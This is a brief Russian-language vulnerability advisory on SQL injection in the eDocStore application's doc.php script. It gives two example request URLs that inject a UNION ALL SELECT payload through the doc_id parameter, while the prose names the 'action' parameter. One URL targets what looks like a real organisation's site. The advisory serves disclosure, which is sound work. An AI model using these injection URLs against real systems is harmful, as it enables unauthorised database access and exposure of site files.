Программа: eDocStore

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «action» сценарием doc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

http://www.server.com/essentials/minutes/doc.php?action= inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2 E2F696E6465782E706870,0x746578742F7 06C61696E,null,null,null,null,null

http://www.nwal.org/essentials/minutes/doc.php?action= inline&doc_id=-1%20UNION%20ALL%20SELECT%200x2E2E2 F696E6465782E706870,0x746578742 F706C61696E,null,null,null,null,null



Оставить мнение